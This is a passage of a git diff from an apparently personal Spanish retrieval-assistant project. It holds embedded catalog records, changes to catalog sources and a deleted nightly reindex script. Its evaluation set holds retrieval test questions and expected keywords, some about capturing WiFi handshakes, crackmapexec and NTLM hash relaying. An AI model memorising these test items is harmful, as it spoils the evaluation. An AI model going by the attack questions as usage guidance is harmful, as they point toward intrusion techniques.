0.04795, 0.01073, 0.04393, -0.01091, -0.03011, -0.05039, -0.0443, 0.019, 0.06686, -0.06495, -0.0934, 0.05379, -0.02973, -0.07923, -0.04049, -0.00096, 0.13993, 0.01535, -0.05487, 0.01093, -0.06829, 0.11579, -0.0018, -0.0964, 0.04516, -0.01138, -0.09414, 0.0852, -0.03247, -0.09375, 0.05811, -0.22485, 0.02128, 0.00296, -0.04414, -0.11029, 0.08112, 0.03281, 0.02657, -0.03638, -0.09625, 0.07026, 0.01417, -0.05754, -0.02688, 0.00971, 0.09392, -0.0037, 0.11269, 0.05508, -0.03752, 0.10356, -0.01133, -0.00777, 0.07024, -0.07224, 0.01826, 0.06364, 0.04523, -0.11411, 0.05641, 0.01656, -0.09157, -0.00717, 0.08933, -0.0187, 0.03511, -0.03924, 0.04099, -0.07495, -0.02228, 0.02199, -0.03806, -0.05648, -0.07031, -0.05507, 0.03353, -0.05421, 0.05853, 0.12918, -0.07698, -0.00236, 0.00825, 0.00052, 0.10271, 0.01837, 0.00835, -0.08813, -0.00995, -0.05853, -0.04367, 0.04362, -0.11766, -0.05677, -0.04453, 0.00834, 0.00574, -0.0422, -0.06425, -0.02501, -0.07132, -0.06042, -0.04193, -0.09095, -0.02319, 0.01255, 0.01435, -0.03398, 0.1014, -0.11444, -0.02439, 0.04717, 0.02236, -0.07317, -0.00651, -0.07816, 0.1089, -0.05041, -0.04632, 0.07081, 0.00282, -0.00523, -0.01719, 0.03823, 0.02142, -0.01317, 0.0556, -0.00223, -0.08459, 0.04683, -0.02787, -0.05322, -0.01498, 0.04154, -0.07532, -0.08424, 0.03318, 0.02754, -0.00475, -0.06447, -0.01418, 0.0648, -0.0083, 0.04951, -0.04418, 0.02389, 0.02221, -0.02144, 0.02726, 0.00136, -0.09997, -0.02059, 0.00307, 0.0664, 0.01985, -0.02992, -0.02097, -0.00388, -0.01416, -0.0451, 0.058, -0.06068, -0.01824, -0.03867, 0.05445, 0.00592, -0.10541, 0.05975, 0.02966, -0.11559, -0.02456, 0.01539, 0.03252, 0.00654, 0.04379, 0.07779, -0.037, 0.06826, -0.01227, 0.07221, -0.09619, 0.06987, 0.03292, 0.06267, -0.02066, -0.02103, 0.00992, 0.03237, -0.0051, 0.04744, 0.06182, 0.02772, -0.06074, -0.04197, -0.0605, -0.01334, 0.086, 0.03162, -0.04477, -0.01529, 0.01494, -0.05834, 0.04007, 0.07807, -0.04804, -0.02709, 0.03351, 0.03644, -0.08366, 0.06645, -0.01529]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "cual es una alternativa libre a Whisper para la transcripciΓ³n de audio con IA?", "v": [-0.042, 0.10469, -0.01029, 0.0286, 0.08342, -0.07446, -0.06402, -0.10721, -0.07511, -0.0058, -0.05076, -0.15214, -0.0374, 0.01486, 0.077, -0.04762, 0.05361, -0.05718, 0.1661, 0.0383, -0.00228, 0.09248, -0.15191, -0.13984, -0.0363, -0.07383, 0.03562, 0.00539, -0.11807, -0.00531, -0.06669, -0.0185, 0.05758, -0.00098, -0.04869, 0.01557, -0.00027, 0.1509, 0.10633, 0.11716, 0.05827, -0.12662, 0.06653, 0.1342, -0.00272, -0.05653, -0.03428, 0.05638, -0.06998, 0.06618, -0.04408, -0.00097, -0.03202, 0.06738, 0.05142, -0.0236, 0.11445, -0.10995, -0.05246, -0.00808, 0.02018, 0.06024, -0.06628, -0.0667, 0.07006, -0.00721, -0.0873, -0.11478, -0.06033, 0.0836, 0.09314, -0.0803, 0.04515, -0.00869, 0.01321, 0.10871, -0.10283, -0.08845, 0.04318, 0.01188, 0.04816, -0.05782, -0.005, -0.02176, -0.01963, 0.02206, 0.05059, -0.09392, 0.09302, 0.1234, -0.00752, -0.00034, 0.06191, -0.00418, 0.07505, -0.18729, -0.00734, 0.092, -0.00239, 0.07211, 0.0346, 0.08589, -0.12066, 0.03317, 0.02734, 0.04689, 0.0091, 0.01364, -0.0282, -0.01702, -0.02141, 0.0924, -0.03702, -0.01527, -0.00289, -0.06874, -0.03504, 0.0563, 0.1049, 0.0469, -0.03665, 0.0622, -0.05754, -0.01787, -0.01962, 0.00379, -0.01109, -0.03775, 0.0045, 0.09796, 0.09425, 0.02424, -0.03333, -0.20984, -0.01858, -0.07274, 0.04599, 0.04596, 0.05368, 0.05318, 0.05218, -0.00375, 0.00275, -7e-05, 0.03585, -0.06567, 0.00535, -0.01125, -0.02425, -0.03764, -0.115, 0.05347, -0.0238, 0.03789, -0.01684, -0.01862, 0.05429, -0.0348, -0.05636, 0.08737, -0.00503, -0.06087, 0.03549, -0.07635, 0.03138, -0.01034, -0.01786, -0.07237, -0.04301, -0.1003, -0.00976, 0.03281, 0.08771, -0.03306, -0.02237, -0.0819, -0.02428, -0.05953, 0.13712, -0.08011, 0.03305, 0.01793, -0.05417, -0.00845, -0.00799, -0.0327, -0.02568, -0.06506, -0.06086, 0.00451, -0.02116, 0.00207, -0.08507, 0.00876, 0.0257, 0.01284, -0.04032, -0.08167, -0.12415, -0.02517, -0.09999, -0.02856, 0.00297, -0.07007, 0.01437, 0.00455, -0.01888, 0.04235, -0.0037, 0.10799, 0.05226, 0.02009, 0.05593, 0.02719, -0.08746, 0.01467, 0.00733, -0.00141, -0.02773, 0.03828, 0.06298, 0.07537, 0.06969, 0.01407, -0.00462, -0.00974, 0.03285, -0.00084, -0.02162, 0.02241, 0.01333, 0.10712, 0.01262, -0.03609, -0.00214, 0.0644, -0.04765, 0.03619, -0.03924, -0.03654, 0.03939, 0.04138, -0.05468, -0.03784, -0.04712, -0.03046, -0.12821, 0.04162, 0.00881, -0.0333, -0.01279, 0.07195, 0.04012, -0.01783, 0.08991, 0.02914]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Quarto β€” Scientific and technical open-source publishing system built on Pandoc. Biological Image Analysis β€” Interpreting biological phenomena using images. ChatGPT β€” Artificial intelligence chatbot developed by OpenAI. Whisper β€” Open-source AI-powered speech recognition system developed by OpenAI. Stock Trading β€” Purchase and sale of equities of publicly traded companies to generate profits. Steam Deck β€” A handheld gaming computer developed by Valve. Astrophotography β€” Photography of astronomical objects, celestial events, or areas of the night sky. HPC β€” High Performance Computing. Geocaching β€” Outdoor treasure-hunting activity that uses GPS-enabled devices. Regex β€” Specialized language for matching patterns in text. Event-Driven Architecture β€” A software architecture approach where services collaborate by publishing and subscribing to events. Permacomputing β€” Resilient and regenerative computing practices inspired by permaculture.", "indexar": "con que puedo analizar imΓ‘genes biolΓ³gicas e interpretar fenΓ³menos?", "v": [0.12162, 0.18487, -0.00691, -0.06738, -0.03031, 0.00786, -0.00286, -0.01687, -0.03632, -0.06046, 0.20615, 0.01514, -0.11117, 0.07084, 0.0738, 0.01963, 0.04536, -0.05754, 0.01968, -0.02694, 0.01956, -0.06059, -0.14476, -0.03595, -0.00244, -0.0624, -0.12763, 0.05194, 0.1325, -0.0232, -0.03178, 0.10888, 0.12421, -0.083, -0.06502, 0.01106, -0.10994, -0.06791, -0.06284, -0.01804, -0.07705, -0.07133, 0.01469, -0.06735, -0.09047, -0.02038, -0.22977, -0.0276, -0.01606, -0.12835, 0.06162, 0.06456, -0.15373, 0.0422, -0.01694, -0.1037, 0.07465, -0.12928, 0.0927, -0.02039, 0.0792, 0.16766, 0.03687, -0.00488, 0.04464, -0.01185, 0.03831, 0.05462, 0.00022, -0.09305, -0.04716, -0.01149, 0.00477, 0.01539, 0.09051, 0.08981, -0.06402, -0.02796, 0.06037, 0.01672, -0.05315, 0.10835, -0.06514, 0.13847, -0.05613, -0.00719, -0.08678, -0.07164, -0.00272, -0.11996, -0.01341, -0.06344, 0.11212, -0.02831, 0.02569, 0.0524, 0.01183, -0.05814, -0.03368, 0.12509, 0.03052, -0.01042, -0.06841, 0.0064, 0.05801, 0.0664, 0.10432, -0.07107, -0.03085, -0.05406, -0.09013, 0.0218, -0.01232, -0.11665, 0.00171, 0.08009, -0.0751, -0.05709, -0.07162, 0.02168, -0.0353, 0.02891, 0.0537, -0.04663, -0.01793, -0.00808, 0.06788, 0.04022, -0.00257, 0.056, -0.05546, 0.05552, 0.01853, -0.00815, -0.0702, -0.01128, 0.00825, -0.07712, -0.05072, -0.0759, -0.01442, 0.07614, -0.03322, -0.0149, 0.03809, 0.05128, 0.00302, -0.05884, -0.10729, 0.01136, 0.08295, 0.03838, -0.02013, 0.05823, 0.06389, 0.05674, -0.07276, -0.03071, -0.05797, -0.03993, -0.01159, 0.06487, 0.09233, 0.0519, -0.04408, -0.02664, -0.04044, -0.06273, 0.02671, 0.00876, -0.01818, -0.01694, -0.06345, -0.03978, 0.0231, 0.04583, 0.00126, -0.03176, -0.02104, -0.0065, -0.02239, 0.03354, -0.00051, -0.03917, -0.01064, 0.03541, -0.05185, 0.03922, -0.02883, 0.00368, 0.03078, 0.01573, -0.01383, 0.02429, 0.08978, 0.02232, -0.03851, 0.05156, 0.01357, -0.01917, 0.00689, -0.01136, -0.04069, -0.01413, 0.01033, 0.06169, -0.0559, 0.12323, -0.03345, -0.04098, -0.0817, -0.04511, 0.05853, -0.11419, -0.01898, -0.01281, 0.03951, 0.02978, -0.02299, 0.03985, 0.03837, 0.04461, 0.11436, 0.03658, -0.01229, -0.03035, -0.01207, 0.01204, 0.04275, 0.02611, -0.02428, 0.08631, 0.03346, 0.02165, 0.01771, 0.03147, 0.0147, -0.05019, -0.03041, -0.02804, 0.07784, 0.01066, -0.05704, -0.05821, 0.00657, -0.00113, -0.04606, 0.01153, 0.10324, -0.09864, -0.00246, 0.0571, 0.03536, -0.02509, 0.08077, -0.05807]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "cual es una herramienta terminal para programaciΓ³n con inteligencia artificial?", "v": [-0.01886, 0.03456, -0.10233, -0.2566, 0.04534, -0.16547, -0.10214, -0.00803, -0.12491, 0.14417, -0.03204, 0.00634, -0.01191, 0.03448, 0.05279, 0.04883, 0.04758, -0.1322, 0.06888, 0.02413, -0.03671, 0.07454, -0.08242, -0.01265, -0.02252, 0.01991, -0.06458, 0.0751, -0.15818, -0.07534, -0.02785, -0.05704, 0.13161, -0.14529, -0.07323, -0.11614, -0.01037, 0.13147, 0.02178, 0.07738, -0.0222, -0.00161, -0.02887, 0.13627, 0.14558, 0.03527, 0.03592, -0.00112, 0.09072, 0.05971, -0.10718, -0.03637, 0.04136, 0.01884, 0.06787, -0.14629, 0.12749, -0.12868, 0.01114, -0.12458, -0.09769, 0.04182, -0.05964, 0.04696, -0.00311, 0.11471, -0.00445, -0.02966, -0.07225, 0.05508, 0.04662, -0.01769, -0.07182, 0.06813, 0.01752, 0.0584, -0.03052, 0.04643, 0.13583, 0.00518, -0.09666, -0.03103, -0.06006, -0.00817, 0.05291, -0.1237, 0.02761, 0.02401, 0.02737, -0.03443, -0.02425, 0.04775, -0.00829, 0.05427, 0.11204, 0.03563, 0.08104, -0.05691, -0.05104, 0.04896, 0.08487, -0.06703, -0.13799, 0.11795, -0.02715, 0.10106, -0.01717, -0.03608, -0.04831, -0.03482, 0.0711, -0.0036, 0.0572, 0.0246, -0.04295, 0.05764, 0.04699, 0.02305, 0.02632, -0.01356, -0.03386, 0.02886, -0.03105, -0.04221, 0.03867, 0.00918, -0.06834, 0.09826, 0.05728, -0.06382, -0.00607, -0.12324, 0.00132, -0.05258, -0.03446, -0.00363, 0.06782, -0.15541, -0.00944, 0.02998, -0.02355, 0.04677, -0.00049, -0.08452, 0.02018, 0.0286, -0.04666, -0.00159, 0.00402, -0.02435, 0.04138, -0.02242, 0.00771, 0.02242, -0.0736, 0.01195, -0.03378, -0.01438, -0.1249, 0.05659, -0.04353, -0.07698, -0.03206, 0.03097, 0.02624, -0.01266, 0.03025, 0.03322, 0.06268, 0.07936, -0.0, 0.01403, 0.0356, -0.00949, -0.01981, -0.03669, -0.07532, 0.02443, 0.00144, -0.1101, -0.04245, -0.02649, 0.01513, -0.04133, 0.03438, -0.08597, 0.01457, -0.06248, 0.0234, 0.02316, 0.00814, 0.03255, -0.00966, 0.04047, 0.11731, -0.01788, -0.04626, -0.04231, -0.00848, -0.00534, -0.01244, 0.07976, 0.02421, -0.01001, -0.02912, 0.1239, 0.02384, -0.06104, -0.02019, 0.03738, -0.03807, -0.03733, 0.02327, -0.0062, 0.01845, -0.02943, -0.05518, -0.02389, -0.01775, 0.01398, 0.00403, -0.04504, 0.01486, 0.05071, -0.04411, -0.0129, 0.04915, 0.09957, 0.00266, -0.03832, -0.01293, -0.02439, 0.0193, -0.03418, -0.00967, -0.016, 0.00085, -0.02685, -0.02613, -0.04813, -0.04212, 0.0725, -0.01497, -0.07, -0.03649, -0.01537, -0.03322, -0.047, -0.03102, -0.05357, -0.07291, 0.03049, 0.05941, -0.05836, 0.01157, 0.00805]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "con que puedo ayudar a programar en el terminal sin instalar nada extra?", "v": [0.08731, 0.15764, -0.24952, -0.18025, 0.06374, -0.06088, 0.01195, -0.01529, -0.14635, 0.04856, -0.17882, -0.00962, 0.044, -0.04075, -0.02385, -0.02558, -0.03005, -0.07222, 0.15142, 0.02521, 0.01995, 0.04008, -0.06904, -0.0656, 0.07738, 0.08573, -0.02253, -0.02674, -0.13078, -0.11805, -0.01992, -0.04561, 0.14724, -0.13871, 0.00015, -0.0432, 0.02629, 0.00132, 0.05134, 0.04126, 0.04068, 0.06776, 0.0217, 0.07284, 0.08391, -0.01519, 0.10772, -0.0671, 0.10934, -0.05499, -0.02289, 0.02161, -0.03946, -0.06248, 0.04368, -0.0859, 0.08664, -0.18596, 0.03206, -0.03406, -0.01043, 0.13049, -0.02825, 0.10338, 0.08416, 0.11586, -0.00661, 0.0475, -0.09191, 0.04522, -0.04716, 0.07452, -0.02226, -0.00841, 0.02244, 0.07485, -0.03818, -0.04363, 0.15263, 0.03984, 0.00156, 0.00549, 0.02468, -0.05622, 0.01618, -0.07989, -0.05019, 0.04859, 0.01735, -0.05972, 0.05896, 0.00972, 0.00224, 0.0055, 0.06468, -0.06126, 0.10397, 0.06188, 0.00775, 0.01534, 0.08628, -0.06314, 0.01376, 0.12731, -0.01317, -0.04308, 0.10179, -0.1035, 0.03461, -0.04893, 0.04974, -0.00227, 0.0373, -0.03598, -0.09412, -0.02965, 0.01362, -0.00403, -0.04792, -0.00314, -0.05903, -0.0154, 0.01252, 0.05517, 0.04269, -0.0163, -0.01846, 0.118, 0.04933, 0.05736, 0.01447, -0.08629, 0.04331, -0.01647, -0.11128, 0.05054, 0.00423, -0.06952, -0.03134, 0.0214, 0.0156, 0.07932, 0.01208, -0.00479, 0.05005, 0.07784, -0.0629, 0.02984, -0.0325, -0.08932, 0.11559, 0.04115, 0.03169, 0.1063, -0.11879, -0.01091, 0.11563, 0.02097, -0.03013, 0.01311, -0.06653, -0.00862, -0.07137, -0.01874, -0.01763, -0.01527, -0.10229, -0.02887, 0.06151, 0.0572, 0.01399, 0.04894, 0.03278, -0.01473, 0.05995, -0.01094, 0.0055, -0.04804, 0.02112, -0.01908, -0.06444, 0.04207, 0.03204, -0.00838, -0.03599, -0.05933, -0.01829, -0.04178, 0.0041, 0.03063, 0.07264, 0.05174, -0.04195, 0.00667, -0.00926, -0.0194, -0.00321, -0.04606, -0.01935, -0.03359, -0.03782, 0.07879, -0.00214, -0.02041, 0.10559, 0.06021, -0.12305, 0.05787, 0.03746, 0.08613, -0.00097, -0.01954, -0.02661, -0.00141, -0.01556, -0.04576, -0.01345, 0.05178, 0.02891, 0.03625, 0.01533, -0.01168, 0.04345, 0.01542, -0.00764, -0.03293, 0.05188, 0.09449, 0.01828, 0.04767, -0.04272, 0.01791, -0.0019, -0.02679, -0.02101, -0.02182, 0.00073, -0.02227, -0.03044, -0.04373, -0.00221, 0.06106, 0.02319, -0.05944, -0.04533, -0.04162, -0.04336, 0.00778, -0.02064, -0.01206, -0.03756, 0.08025, 0.08608, -0.05753, 0.00823, 0.06652]} +{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Standards β€” Proposals and standards that define and enhance software, languages, and related technologies. Claude Code β€” Terminal-based AI coding assistant by Anthropic. Gemini CLI β€” Terminal-based AI coding assistant by Google. SAP Commerce β€” An e-commerce platform built with Java, Spring MVC, and Angular. Tech Ethics β€” Mitigating and avoiding the potential negative effects of technology on society. Copilot Agents β€” AI pair programming assistant by GitHub that provides code suggestions and completions.", "indexar": "hay alguna alternativa gratuita a los asistentes de codificaciΓ³n por IA?", "v": [-0.025, 0.19984, -0.15134, -0.00812, -0.05495, -0.10772, 0.05319, 0.05499, -0.25535, -0.07226, -0.07314, -0.17095, 0.0921, 0.01021, 0.10632, -0.0564, 0.15962, 0.02415, 0.10031, 0.05898, 0.02124, 0.11521, -0.13601, 0.02769, -0.08808, -0.02127, -0.07332, 0.02155, -0.00559, -0.03661, 0.06457, -0.10625, 0.034, 0.04443, -0.08769, -0.06642, 0.09688, 0.05544, 0.0428, -0.0014, -0.01437, 0.00925, 0.03889, -0.00793, 0.03502, -0.03908, -0.17185, 0.095, -0.05006, 0.0355, -0.07953, -0.08912, 0.0477, -0.02345, 0.01525, -0.05283, 0.00839, -0.1128, -0.11876, -0.07635, -0.00577, 0.10992, -0.07548, 0.04291, 0.10068, 0.08144, 0.03531, -0.0702, -0.02543, -0.0181, -0.03505, -0.09225, -0.02984, -0.08913, -0.04936, 0.06665, -0.10313, -0.02191, 0.00363, 0.11877, 0.05709, -0.02442, 0.10752, -0.09024, -0.12696, 0.04892, -0.01444, -0.14973, 0.00942, 0.01099, -0.00124, -0.03694, 0.1256, 0.07181, -0.02343, -0.09898, 0.05301, 0.06164, -0.014, 0.15143, 0.07109, 0.00998, 0.01912, -0.00624, 0.05298, 0.08249, -0.05981, -0.05917, 0.02498, -0.02319, -0.02848, 0.03692, -0.02559, 0.00366, 0.08776, -0.03047, 0.03146, 0.0048, 0.03577, 0.02353, 0.00339, 0.03917, -0.06201, -0.04849, 0.06327, 0.09279, 0.00776, 0.0932, -0.02063, -0.05453, 0.08216, -0.01173, -0.0208, -0.07861, -0.02131, -0.10046, 0.06651, -0.06728, -0.01751, 0.03955, -0.0503, 0.03665, -0.01206, -0.03685, 0.06108, -0.04823, 0.02255, -0.044, -0.04368, -0.07411, -0.08621, -0.03873, 0.01645, 0.12806, -0.03625, 0.00778, -0.05579, 0.01196, 0.01624, 0.07228, -0.07343, -0.03577, 0.01032, -0.02586, -0.08421, -0.02734, -0.00034, -0.02756, -0.08244, 0.07733, 0.00602, 0.09457, 0.01939, -0.0138, 0.04316, -0.02274, 0.03302, -0.01726, 0.03163, -0.09725, 0.08712, 0.01292, -0.05285, -0.05963, 0.02865, -0.028, -0.00666, 0.03554, 0.07245, -0.02667, 0.03105, 0.02681, -0.06772, -0.0168, -0.03025, -0.02977, -0.01165, -0.0875, -0.03085, 0.02728, -0.05476, -0.02238, 0.02347, -0.04306, 0.01172, 0.02637, -0.0048, 0.07318, 0.0001, 0.0723, -0.01709, 0.01708, 0.04838, -0.03758, -0.02424, 0.02331, 0.00769, 0.00065, 0.00275, 0.02424, 0.03919, -0.0263, 0.01952, 0.07203, -0.00846, 0.00161, 0.04395, 0.08961, 0.00998, 0.06322, 0.02949, 0.02303, 0.04263, 0.05177, -0.01009, 0.00809, -0.01408, 0.05165, -0.02463, -0.02388, 0.01894, 0.05488, -0.00309, -0.02, -0.02432, -0.03878, -0.09376, -0.02347, -0.01482, -0.03372, -0.03556, 0.01866, -0.01328, -0.03025, 0.01677, 0.05489]} diff --git a/nucleo/saber/awesome.py b/nucleo/saber/awesome.py index 282eef8..47ffdf9 100644 --- a/nucleo/saber/awesome.py +++ b/nucleo/saber/awesome.py @@ -36,20 +36,6 @@ CATALOGOS = [ "LISTAS", "CC0-1.0", True), ("awesome-hacking", os.path.join("_pages", "index.rst"), "rst", "awesome-hacking (jekil)", "PENTESTERS", "", False), - # Segunda tanda (16-17 ago). publico=False hasta verificar licencia: no salen - # al indice publico, solo al personal que usa JARVIS en esta maquina. - ("awesome-sysadmin", "README.md", "md", "awesome-sysadmin", "SISTEMA", "", False), - ("awesome-cli-apps", "readme.md", "md", "awesome-cli-apps", "SISTEMA", "", False), - ("awesome-security", "README.md", "md", "awesome-security", "PENTESTERS", "", False), - ("awesome-pentest", "README.md", "md", "awesome-pentest", "PENTESTERS", "", False), - ("awesome-shell", "README.md", "md", "awesome-shell", "SISTEMA", "", False), - ("awesome-linux", "README.md", "md", "awesome-linux", "SISTEMA", "", False), - # Tercera tanda (madrugada 17 ago). Todas publico=False hasta revisar licencia. - ("awesome-osint", "README.md", "md", "awesome-osint", "PENTESTERS", "", False), - ("awesome-devops", "README.md", "md", "awesome-devops", "SISTEMA", "", False), - ("awesome-docker", "README.md", "md", "awesome-docker", "SISTEMA", "", False), - ("awesome-go", "README.md", "md", "awesome-go", "SISTEMA", "", False), - ("awesome-python", "README.md", "md", "awesome-python", "SISTEMA", "", False), ] # markdown: - [Nombre](http...) - Descripcion ... `Lic` `Lenguaje` diff --git a/nucleo/saber/enriquece/eval_set.jsonl b/nucleo/saber/enriquece/eval_set.jsonl index 937a58e..ac9d453 100644 --- a/nucleo/saber/enriquece/eval_set.jsonl +++ b/nucleo/saber/enriquece/eval_set.jsonl @@ -43,15 +43,3 @@ {"pregunta": "como escaneo redes wifi y capturo handshakes", "espera": ["airodump", "aircrack", "handshake", "wpa", "airgeddon"]} {"pregunta": "usar crackmapexec para barrer una red windows", "espera": ["crackmapexec", "cme ", "smb", "--shares", "spray"]} {"pregunta": "leer un hash ntlm y reutilizarlo por la red", "espera": ["ntlm", "hash", "relay", "responder", "ntlmrelayx"]} -{"pregunta": "alternativa self-hosted a google analytics", "espera": ["analytic", "plausible", "matomo", "goatcounter"]} -{"pregunta": "servidor multimedia para ver peliculas en casa", "espera": ["jellyfin", "plex", "streaming", "media"]} -{"pregunta": "gestor de contraseΓ±as autoalojado", "espera": ["password", "vaultwarden", "bitwarden", "contrasen"]} -{"pregunta": "herramienta de linea de comandos para procesar json", "espera": ["jq", "jp", "fx", "json"]} -{"pregunta": "monitorizar los recursos del sistema en linux", "espera": ["htop", "netdata", "monitor", "glances"]} -{"pregunta": "framework de plugins para la shell zsh", "espera": ["zsh", "oh-my-zsh", "prezto", "shell"]} -{"pregunta": "agente de inteligencia artificial para pentesting automatico", "espera": ["strix", "pentest", "vulnerab"]} -{"pregunta": "programa para modelado 3d y renderizado", "espera": ["blender", "3d"]} -{"pregunta": "software para grabar y mezclar audio multipista", "espera": ["ardour", "audio"]} -{"pregunta": "herramienta para automatizar el hogar domotica", "espera": ["home", "iot", "domot", "assistant"]} -{"pregunta": "distribucion de linux para privacidad", "espera": ["tails", "privac", "linux"]} -{"pregunta": "escaner de vulnerabilidades web", "espera": ["nuclei", "nikto", "sqlmap", "scanner", "vulnerab"]} diff --git a/nucleo/saber/enriquece/reentrena_noche.sh b/nucleo/saber/enriquece/reentrena_noche.sh deleted file mode 100755 index 1658a97..0000000 --- a/nucleo/saber/enriquece/reentrena_noche.sh +++ /dev/null @@ -1,71 +0,0 @@ -#!/usr/bin/env bash -# Reentrenamiento nocturno AMPLIADO del RAG. Encadena las fases y las deja -# corriendo horas, sin tocar gitea. Cada fase es reanudable por su cuenta. -# -# ./reentrena_noche.sh -# -# Fases: -# 1. Espera a que termine cualquier reindex en curso. -# 2. Sintesis FRESCA de todo el contenido nuevo (conocimiento + catalogo + -# apps instaladas + docs de strix) -> preguntas-gancho. -# 3. Reindex personal con los ganchos horneados. -# 4. Evaluacion hit@k (numeros). -# 5. Refresco de COFRE: cosecha + sintesis de los apuntes. -# 6. Reindex final + evaluacion. -# -# Todo el ruido va al log; a la salida estandar solo hitos con hora. -set -uo pipefail - -AQUI=$(cd -P "$(dirname "${BASH_SOURCE[0]:-$0}")" && pwd) -NUCLEO=$(cd "$AQUI/../.." && pwd) -PY="$NUCLEO/venv/bin/python" -[ -x "$PY" ] || PY=python3 -DATOS="$NUCLEO/datos" -LOG="${1:-$DATOS/reentrena_noche.log}" - -hora() { date +%H:%M:%S; } -hito() { echo "[$(hora)] $*" | tee -a "$LOG"; } - -cd "$NUCLEO" -hito "=== ARRANCA reentrenamiento nocturno ampliado ===" - -# --- Fase 1: no competir con un reindex en curso --- -while pgrep -f "saber.indexa" | grep -qv $$ 2>/dev/null; do - sleep 20 -done -hito "fase 1 ok: no hay reindex compitiendo" - -# --- Fase 2: sintesis fresca del contenido nuevo --- -hito "fase 2: sintesis del catalogo+nuevo (fresca, puede tardar 1-2 h)" -rm -f "$DATOS/sintesis-catalogo.jsonl" "$DATOS/sintesis-catalogo.jsonl.hecho" -"$PY" -m saber.enriquece.sintetiza_catalogo >>"$LOG" 2>&1 -hito "fase 2 ok: $(wc -l < "$DATOS/sintesis-catalogo.jsonl" 2>/dev/null) preguntas-gancho nuevas" - -# --- Fase 3: reindex con los ganchos --- -hito "fase 3: reindex personal con ganchos" -"$PY" -m saber.indexa >>"$LOG" 2>&1 -hito "fase 3 ok: indice reconstruido" - -# --- Fase 4: evaluacion --- -hito "fase 4: evaluacion hit@k" -"$PY" -m saber.enriquece.evalua "$DATOS/saber.jsonl" "$DATOS/saber.jsonl" 2>>"$LOG" \ - | grep -iE "hit@|sim" | head -3 | tee -a "$LOG" - -# --- Fase 5: refresco de COFRE (cosecha + sintesis) --- -if [ "${SIN_COFRE:-0}" = "1" ]; then - hito "fase 5: OMITIDA (SIN_COFRE=1, el refresco de COFRE ya se hizo)" -else - hito "fase 5: refresco de COFRE (cosecha + sintesis, largo)" - "$PY" -m saber.enriquece.cosecha >>"$LOG" 2>&1 && hito " cosecha ok" || hito " cosecha fallo (sigo)" - rm -f "$DATOS/sintesis.jsonl.hecho" - "$PY" -m saber.enriquece.sintetiza >>"$LOG" 2>&1 && hito " sintesis COFRE ok" || hito " sintesis COFRE fallo (sigo)" -fi - -# --- Fase 6: reindex final + evaluacion --- -hito "fase 6: reindex final" -"$PY" -m saber.indexa >>"$LOG" 2>&1 -hito "fase 6: evaluacion final" -"$PY" -m saber.enriquece.evalua "$DATOS/saber.jsonl" "$DATOS/saber.jsonl" 2>>"$LOG" \ - | grep -iE "hit@|sim" | head -3 | tee -a "$LOG" - -hito "=== FIN del reentrenamiento nocturno ===" diff --git a/nucleo/saber/enriquece/sintetiza_catalogo.py b/nucleo/saber/enriquece/sintetiza_catalogo.py index 9e7fa39..8f2f537 100644 --- a/nucleo/saber/enriquece/sintetiza_catalogo.py +++ b/nucleo/saber/enriquece/sintetiza_catalogo.py @@ -61,14 +61,6 @@ def _fragmentos(): frags.append(e) for e in awesome.entradas(): # catalogo: ya trae `publico` frags.append(e) - for e in indexa._instalado(): # apps de esta maquina: personal - e = dict(e) - e["publico"] = False - frags.append(e) - for e in indexa._docs_extra(): # docs de strix, etc.: personal - e = dict(e) - e["publico"] = False - frags.append(e) frags.sort(key=lambda d: (0 if d.get("publico") else 1, 0 if d.get("tipo") == "metodologia" else 1)) return frags diff --git a/nucleo/saber/indexa.py b/nucleo/saber/indexa.py index bd9da6e..2b059b4 100755 --- a/nucleo/saber/indexa.py +++ b/nucleo/saber/indexa.py @@ -200,57 +200,6 @@ def 